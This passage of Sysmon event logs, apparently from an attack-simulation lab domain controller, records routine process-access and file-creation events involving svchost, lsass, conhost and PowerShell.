C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.354","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5801,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.354\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.354","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5802,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.354\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.354","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5803,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.354\r\nSourceProcessGUID: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nSourceProcessId: 4848\r\nSourceThreadId: 1100\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-00107B610800}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF448A0BC3)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.354","SourceProcessGUID":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","SourceProcessId":"4848","SourceThreadId":"1100","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-00107B610800}","TargetProcessId":"3864","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF448A0BC3)","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5804,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.354\r\nSourceProcessGUID: {E2A3D6B1-11D4-5F25-0000-00100D0C0800}\r\nSourceProcessId: 796\r\nSourceThreadId: 2504\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-00107B610800}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.354","SourceProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00100D0C0800}","SourceProcessId":"796","SourceThreadId":"2504","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-00107B610800}","TargetProcessId":"3864","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5805,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.369\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-00107B610800}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.369","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-00107B610800}","TargetProcessId":"3864","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5806,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.385\r\nProcessGuid: {E2A3D6B1-11D7-5F25-0000-00107B610800}\r\nProcessId: 3864\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_b042smms.zjl.ps1\r\nCreationUtcTime: 2020-08-01 06:55:19.385","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.385","ProcessGuid":"{E2A3D6B1-11D7-5F25-0000-00107B610800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_b042smms.zjl.ps1","CreationUtcTime":"2020-08-01 06:55:19.385","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5807,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.416\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-00107B610800}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.416","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-00107B610800}","TargetProcessId":"3864","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5808,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.416\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-00107B610800}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.416","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-00107B610800}","TargetProcessId":"3864","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
